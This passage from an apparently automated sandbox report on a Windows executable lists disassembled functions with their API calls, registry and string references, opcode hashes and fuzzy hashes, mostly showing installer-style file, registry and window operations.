                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$Prop
                                                                                      • String ID:
                                                                                      • API String ID: 3887896539-0
                                                                                      • Opcode ID: 86a15e674b3ea48860a72e4751bd866d9c55aec508b8b4782c27e449c12c4e66
                                                                                      • Instruction ID: 44bb5ba5a57c54889193f85f1a8a28b74f903b4ef320443ee5f093ebf11223bc
                                                                                      • Opcode Fuzzy Hash: 86a15e674b3ea48860a72e4751bd866d9c55aec508b8b4782c27e449c12c4e66
                                                                                      • Instruction Fuzzy Hash: B611C975500244BFDB00DF99DC85E9A3BE8BB19364F114266B928DB2A1D738D9908B68
                                                                                      Function 004540C4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045425B,?,00000000,0045429B), ref: 004541A1
                                                                                      Strings
                                                                                      • PendingFileRenameOperations2, xrefs: 00454170
                                                                                      • PendingFileRenameOperations, xrefs: 00454140
                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454124
                                                                                      • WININIT.INI, xrefs: 004541D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                      • API String ID: 47109696-2199428270
                                                                                      • Opcode ID: 3b606e1cfbb150bd088f74f1063c905db1383d3fd6ed35e0c09aba21d543f6f9
                                                                                      • Instruction ID: 8ceaccac1fe58e6261fec66e20af0929b63452d54162f6f6a325dab65676f0d5
                                                                                      • Opcode Fuzzy Hash: 3b606e1cfbb150bd088f74f1063c905db1383d3fd6ed35e0c09aba21d543f6f9
                                                                                      • Instruction Fuzzy Hash: 0051BA30E001189FDB10DF62DC519DEB7B9EFC4348F5085B7F814AB292DB78AA85CA58
                                                                                      Function 004639E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00463A85
                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463AAB
                                                                                        • Part of subcall function 00463928: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004639C0
                                                                                        • Part of subcall function 00463928: DestroyCursor.USER32(00000000), ref: 004639D6
                                                                                      • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00463B07
                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463B2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                                      • String ID: c:\directory
                                                                                      • API String ID: 2926980410-3984940477
                                                                                      • Opcode ID: 1a7901e35b7efb8855ed844898b1e62419ded63c9a28a762335ba207438abc47
                                                                                      • Instruction ID: 671f662d79a6b5497fd1efd513546b718c4d5ac7f56db0c83477fb4c85f01fd4
                                                                                      • Opcode Fuzzy Hash: 1a7901e35b7efb8855ed844898b1e62419ded63c9a28a762335ba207438abc47
                                                                                      • Instruction Fuzzy Hash: 5C417F70640288AFD711DF55DC8AFDEBBE8EB48705F1040A6F904DB382D679EE808B59
                                                                                      Function 0042DC7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491FBA), ref: 0042DCA3
                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                      • API String ID: 588496660-1846899949
                                                                                      • Opcode ID: 1ac9f45d9403d68368f5ea09b308c2771ffc131f1d77a79e4eddddbac772e20e
                                                                                      • Instruction ID: 479eeeb2458f1cbf9b477f45b3eef1c6296245770f751ec8fb172f928072974a
                                                                                      • Opcode Fuzzy Hash: 1ac9f45d9403d68368f5ea09b308c2771ffc131f1d77a79e4eddddbac772e20e
                                                                                      • Instruction Fuzzy Hash: 57E06DF0B45230AAD620676B7D4AFA327299B64725F54403BB105A619182FD4C40DE5C
                                                                                      Function 0047D994 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetActiveWindow.USER32(?,?,00000000,0047DCA9,?,?,00000001,?), ref: 0047DAA5
                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047DB1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                      • String ID: $Need to restart Windows? %s
                                                                                      • API String ID: 1160245247-4200181552
                                                                                      • Opcode ID: 12037f27ca6cd308aea1d326a4c3b70745560e3ec434e9b2862bfd7b37a3da6d
                                                                                      • Instruction ID: 90cd12f1ce5866ea51d49213f29bb353ee2a99eceb2f679e27348fc142a0b483
                                                                                      • Opcode Fuzzy Hash: 12037f27ca6cd308aea1d326a4c3b70745560e3ec434e9b2862bfd7b37a3da6d
                                                                                      • Instruction Fuzzy Hash: FD91B170A142448FCB11EB69D882B9E77F1AF55308F5080BBE8049B366DB78AD09DB5D
                                                                                      Function 0046B8B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                      • GetLastError.KERNEL32(00000000,0046BAB1,?,?,00000001,00497154), ref: 0046B98E
                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046BA08
                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046BA2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                      • String ID: Creating directory: %s
                                                                                      • API String ID: 2451617938-483064649
                                                                                      • Opcode ID: 6e6b56944f7af39c61aec4d517d3385b6d008573cf9049f4c4aabfc7d62e10ff
                                                                                      • Instruction ID: 7ea54ca36873d6337a8b148a308a739efa0342075aaa82460d6101fa077cad05
                                                                                      • Opcode Fuzzy Hash: 6e6b56944f7af39c61aec4d517d3385b6d008573cf9049f4c4aabfc7d62e10ff
                                                                                      • Instruction Fuzzy Hash: 40512F74E00258ABDB01DFE5C482BDEB7F5EF48304F50856AE851A7382D7785E44CB99
                                                                                      Function 004537C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00453876
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,0045393C), ref: 004538E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                      • API String ID: 2508298434-591603554
                                                                                      • Opcode ID: 7bac0491a20355553d1817e9708559ea9c2ee3dc019520cc376e2a618a3a3bbf
                                                                                      • Instruction ID: 8896df26e74b4f53e6f77957fc07a02fe6ad1856ac683947f167e21e68caa71d
                                                                                      • Opcode Fuzzy Hash: 7bac0491a20355553d1817e9708559ea9c2ee3dc019520cc376e2a618a3a3bbf
                                                                                      • Instruction Fuzzy Hash: 9D4167B0A042189FEB10DF55DC85B9D77B8AB04346F5041BBB908A7293D7785F48CE5C
                                                                                      Function 0045262C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0045271B,?,?,00000000,00496628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452672
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0045271B,?,?,00000000,00496628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045267B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID: .tmp$o1I
                                                                                      • API String ID: 1375471231-2043145612
                                                                                      • Opcode ID: 6263e7da38dc712251df72676f2ee857ab2003e645070e4b394e34e858e0385a
                                                                                      • Instruction ID: 89aaa5dd644a1bfb9c6e4ab11305a67587a6d25824e33790291d603b6c08dcc0
                                                                                      • Opcode Fuzzy Hash: 6263e7da38dc712251df72676f2ee857ab2003e645070e4b394e34e858e0385a
                                                                                      • Instruction Fuzzy Hash: 14216575A002089BDB01EFA1C9929DFB7B8EF58305F50457BEC01B7342DA7CAE058AA5
                                                                                      Function 00451118 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 74D31520.VERSION(00000000,?,?,?,] I), ref: 00451138
                                                                                      • 74D31500.VERSION(00000000,?,00000000,?,00000000,004511B3,?,00000000,?,?,?,] I), ref: 00451165
                                                                                      • 74D31540.VERSION(?,004511DC,?,?,00000000,?,00000000,?,00000000,004511B3,?,00000000,?,?,?,] I), ref: 0045117F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: D31500D31520D31540
                                                                                      • String ID: ] I
                                                                                      • API String ID: 1003763464-27375975
                                                                                      • Opcode ID: ae97c8c8a0c1eba3379072f8b46b7e7df9da348ac85090545a8034cef28368fb
                                                                                      • Instruction ID: c2ad28a97d73236a39d00b1522cfa6caf261f6f5eba90309d69346832355d152
                                                                                      • Opcode Fuzzy Hash: ae97c8c8a0c1eba3379072f8b46b7e7df9da348ac85090545a8034cef28368fb
                                                                                      • Instruction Fuzzy Hash: 5D219235A00508AFDB01DAA98C41EBFB7FCEB49340F5544BAFD00E3392D6799E058769
                                                                                      Function 004543FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,00454467,?,00000001,00000000), ref: 0045445A
                                                                                      Strings
                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454408
                                                                                      • PendingFileRenameOperations, xrefs: 0045442C
                                                                                      • PendingFileRenameOperations2, xrefs: 0045443B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                      • API String ID: 47109696-2115312317
                                                                                      • Opcode ID: 4d74768cc722451e6c2d7b21cab6517138d2d42bcabe4ec3ebcd03ef8cae5871
                                                                                      • Instruction ID: f6b2750a9208994f71abef58e55a78fed862e8850860690132b194e4ac46e676
                                                                                      • Opcode Fuzzy Hash: 4d74768cc722451e6c2d7b21cab6517138d2d42bcabe4ec3ebcd03ef8cae5871
                                                                                      • Instruction Fuzzy Hash: C0F062313442046FDB04D6A6EC12B5B73ADD7C5B19FA0446AFC009A682DA79AD48D51C
                                                                                      Function 004211E4 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenu.USER32(00000000), ref: 004212D1
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu
                                                                                      • String ID:
                                                                                      • API String ID: 3711407533-0
                                                                                      • Opcode ID: 828adb1f4503573b8b19ec7e50c880e5d7ba93b5c851f867c46ca8f401a21855
                                                                                      • Instruction ID: 658f50d7c39b10a4f0c402205ec9e9078e39c2738942e4c3e39302bb3a71e335
                                                                                      • Opcode Fuzzy Hash: 828adb1f4503573b8b19ec7e50c880e5d7ba93b5c851f867c46ca8f401a21855
                                                                                      • Instruction Fuzzy Hash: 7641BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7DCC4582AD
                                                                                      Function 00416AB2 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 601730667-0
                                                                                      • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                                      • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                                      • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                                      • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                                      Function 004239F4 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                                      • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                                      • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnumLongWindows
                                                                                      • String ID:
                                                                                      • API String ID: 4191631535-0
                                                                                      • Opcode ID: b2f5db6fe163c30d8c8c0473a117728a579ec2d7ead3c741ce22ac317b482cf1
                                                                                      • Instruction ID: 335c349655b4e4ce664b27c97d7ab575fba50449cb033fde685ace27ceb71c75
                                                                                      • Opcode Fuzzy Hash: b2f5db6fe163c30d8c8c0473a117728a579ec2d7ead3c741ce22ac317b482cf1
                                                                                      • Instruction Fuzzy Hash: 91115A70700610ABDB10EF68DC85F5A77E8EB08725F11026AF9A4AB2E2C37CDC40CB58
                                                                                      Function 00423038 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                                      • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A14620A480A570EnumFonts
                                                                                      • String ID:
                                                                                      • API String ID: 2780753366-0
                                                                                      • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                                      • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                                      • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                                      • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                                      Function 00453970 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
                                                                                      • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
                                                                                      • CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                      • String ID:
                                                                                      • API String ID: 4071923889-0
                                                                                      • Opcode ID: b5c2dbf5272f504e7b06945f00b02d3f578c52004c30b2aed4c8e7ec893f2b0e
                                                                                      • Instruction ID: f26be41c5c034272f157e269139ed2410fa661b94adc91c278c581610335523b
                                                                                      • Opcode Fuzzy Hash: b5c2dbf5272f504e7b06945f00b02d3f578c52004c30b2aed4c8e7ec893f2b0e
                                                                                      • Instruction Fuzzy Hash: 3301F9F06006087EEB219B998C06F6BBB9CDB457A1F600167F904D32C2C5F89E00CA69
                                                                                      Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalHandle.KERNEL32 ref: 00406287
                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
